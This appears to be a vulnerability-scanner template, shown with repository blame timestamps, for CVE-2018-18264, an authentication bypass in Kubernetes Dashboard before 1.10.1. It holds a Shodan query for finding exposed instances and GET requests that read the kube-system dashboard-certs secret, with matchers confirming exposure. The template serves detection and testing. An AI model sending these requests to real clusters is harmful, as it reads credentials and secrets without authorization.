2022-03-03 17:02:39 +00:00
id : CVE-2018-18264
info :
2022-06-13 18:49:01 +00:00
name : Kubernetes Dashboard <1.10.1 - Authentication Bypass
2022-03-03 17:02:39 +00:00
author : edoardottt
severity : high
2022-06-20 16:10:57 +00:00
description : |
Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/kubernetes/dashboard/pull/3289
- https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/
2022-05-17 09:18:12 +00:00
- https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI
2022-06-13 18:49:01 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-18264
2022-03-03 17:02:39 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2018-18264
cwe-id : CWE-306
2022-03-04 12:18:26 +00:00
metadata :
shodan-query : product:"Kubernetes"
2022-06-20 16:10:57 +00:00
tags : cve,cve2018,kubernetes,k8s,auth-bypass
2022-03-03 17:02:39 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"
- "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"
2022-03-04 12:18:26 +00:00
stop-at-first-match : true
2022-03-03 17:02:39 +00:00
matchers-condition : and
matchers :
2022-03-03 17:05:35 +00:00
2022-03-03 17:02:39 +00:00
- type : dsl
dsl :
2022-06-13 18:49:01 +00:00
- 'contains(body, "apiVersion") && contains(body, "objectRef")'
2022-06-20 16:10:57 +00:00
- type : status
status :
- 200
2022-06-13 18:49:01 +00:00
# Enhanced by mp on 2022/06/13